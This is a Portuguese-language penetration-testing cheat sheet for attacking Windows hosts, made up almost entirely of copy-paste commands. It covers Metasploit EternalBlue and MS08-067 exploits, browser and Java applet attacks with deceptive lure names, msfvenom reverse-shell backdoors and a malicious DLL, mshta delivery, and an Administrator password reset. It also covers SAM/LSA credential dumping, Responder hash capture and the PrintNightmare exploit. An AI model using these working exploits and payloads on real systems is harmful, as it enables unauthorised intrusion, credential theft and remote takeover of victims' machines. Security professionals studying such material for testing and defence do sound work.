Windows

Metasploit

Atacando Windows 7 (Eternal Blue)

Procurando por alvos na rede

msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
set threads 100
run

Explorando a falha

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <ip_alvo>
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <ip_atacante>
exploit

Atacando Windows 7 (Vírus)

O Msfvenom é utilizado nas novas versões do Metasploit, substituindo o msfpayload / msfencode.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip_atacante> LPORT=<port> x > /tmp/backdoor.exe
# ou
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip_atacante> LPORT=<port> -a x86 -f exe -o /root/payload.exe

Faça com que o alvo execute o arquivo .exe:

Entre no modo listener:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <ip_atacante>
exploit

Se até aqui tiver sido efetuado com êxito, irá ser aberto o meterperter.

Atacando Windows 7 pelo Internet Explorer

use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp
set LHOST <ip_atacante>
set SRVHOST <ip_atacante>
set URIPATH videos
exploit

Agora faça com que o alvo abra http://<ip_atacante>:8080/videos pelo Internet Explorer.

Atacando Windows 7 com JAVA

O JAVA tem de estar numa versão um pouco mais antiga para que funcione

msfconsole
use exploit/multi/browser/java_signed_applet # "Multi" e "Browser" significam que são multiplataforma
set payload windows/meterpreter/reverse_tcp
set appletname XVIDEOS # Nome do Applet, pode ser qualquer nome
set certcn Adobe_Flash_Player # Nome do Applet em versões mais antigas pra quem assinou
set srvhost {ip_atacante} # Define o IP do servidor
set srvport 80 # Define a porta do servidor
set uripath videos # Em qual pasta vai ficar armazenado. Nesse caso será <servidor>/videos
set LHOST <ip>
set lport 443
exploit

Agora faça com que o alvo acesse a URL e aceite o java para que o meterpreter tenha sucesso

Atacando Windows XP

Certifique-se antes de que a porta 445 do alvo esteja aberta

# Abre o Metasploit  
msfconsole  
# Selecionando o exploit  
use windows/smb/ms08_067_netapi  
# Selecionando o payload  
set payload windows/meterpreter/reverse_tcp
# Define o host remoto IP do alvo)    
set RHOST <ip_alvo> 
# Define o local host meu IP)   
set LHOST <ip_atacante>
# Comando para ver o que já foi inserido e o que falta  
show options
# Executa tudo o que foi configurado  
exploit

Se até aqui iver sido efetuado com êxito, irá ser aberto o meterperter

Ataque Via Browser

msfconsole
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set payload windows/meterpreter/reverse_tcp
set SRVHOST <ip_hacker>
set LHOST <ip_hacker>
exploit

Agora faça o alvo acessar pelo navegador: http:// OBS.: Certifique-se que seu IP não esteja já utilizando a porta 80

Ativando RDP

Depois de conseguir acesso via Meterpreter, jogue a sessão em backgrund (CTRL + Z) e então execute o seguinte post:

use post/windows/manage/enable_rdp
set SESSION <number_session>
exploit

Depois de ativar o RDP, podemos acessá-lo normalmente. Caso não saiba a senha do Administrador, podemos alterá-la ou até mesmo criar um usuário.

session -i <number_session>
shell
net user administrator novasenha_123

HTA Server (necessário ter RCE)

# Atacante
msfconsole -q
use exploit/windows/misc/hta_server
exploit
# Copie a URL gerada

# Alvo
mshta.exe <url_gerada>

# Atacante
session -i <number_session>

Enum4Linux

Esse tipo de enumaração pode ser grande e poluída a sua leitura, então foque "principalmente" nos itens output similar to nmblookup, check for null session, listing of shares, domain info, password policy e RID cycling output.

# -a = Todas as enumerações
enum4linux -a <ip_alvo>

Caso queira filtrar por determinadas informações, podemos utilizar alguns recursos do enum4linux.

# Somente usuários
enum4linux -U <ip>

# Somente compartilhamento
enum4linux -S <ip>

Pegando Senhas Locais Via LSA

Depois de acessar o Windows como Administrador, execute o comando lsadump2.

Pegando Senhas em Texto Limpo (NTLM)

wce32.exe -w

Pegando Registros Manualmente

C:\> reg.exe save hklm\sam c:\windows\temp\sam.save
C:\> reg.exe save hklm\security c:\windows\temp\security.save
C:\> reg.exe save hklm\system c:\windows\temp\system.save

Isso também pode ser feito com secretsdump.py ou pwdump

Responder

Quando um sistema em uma rede faz uma pesquisa de nome de host DNS que falha, o sistema utiliza Link-Local Multicast Name Resolution (LLMNR) e o Net-BIOS para resolução de nomes substitutos. Quando o host da vítima falha na pesquisa de DNS, esse host começa a perguntar para qualquer host da rede se eles sabem a resolução para esse nome de host que ele está procurando.

Isso pode acontecer, por exemplo, quando o Windows tem uma unidade de rede mapeada e então esse host deixa de existir ou trocou de IP/hostname.

Antes de iniciar o responder, abra o arquivo /etc/responder/Responder.conf e edite o parâmetro RespondTo, filtrando somente pelos IPs (separados por vírgula) que deseja realmente atacar.

python Responder.py -I <interface> -wrf
reponder -I <interface> -Prv

Caso pegue um hash do tipo NetNTLMv2, utilize hashcat com a opção -m 5600.

PrintNightmare

Execute o comando abaixo e verifique se as duas condições no grep estão de acordo.

/usr/bin/impacket-rpcdump @<host> | egrep 'MS-RPRN|MS-PAR'

Caso seja positivo, precisamos baixar o repositório da CVE.

git clone https://github.com/cube0x0/CVE-2021-1675.git
cd CVE-2021-1675

Agora, vamos instalar (caso ainda não tenha) o virtualenv e executar os devidos comandos:

sudo apt install virtualenv

virtualenv --python=python3 impacket
source impacket/bin/activate

Com isso, estaremos dentro do ambiente virtual, então podemos executar a instalação.

pip3 install .
pip2 install .

Agora precisamos gerar nos DLL maliciosa e para isso podemos utilizar o msfvenom.

sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip_atancante> LPORT=1235 -f dll > shell.dll

Deixando o Metasploit no modo listener.

sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost <ip>
set lport 1235
exploit

Com o nosso ambiente já preparado para disparar o ataque e receber a reverse shell, vamos preciso subir um servidor SMB para que o host alvo possa acessar nossa DLL gerada com o msfvenom.

smbserver.py mysther . -smb2support

E por último, realizando o ataque de fato para obter a reverse shell no Meterpreter.

python3 CVE-2021-1675.py <domain>/<user>:'<pass>'@<hostname_alvo> '\\<ip_atacante>\mysther\shell.dll'

Sites

# Diversos comandos para ataque Windows, estilo GTFOBins
https://wadcoms.github.io/
https://arttoolkit.github.io

# Ferramentas para ataques contra Windows
https://lolbas-project.github.io/

# Responder
https://github.com/lgandx/Responder-Windows

# Pegando Credenciais
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/

# PrintNightmare
https://github.com/cube0x0/CVE-2021-1675
PreviousEnumerationNextActive Directory

Last updated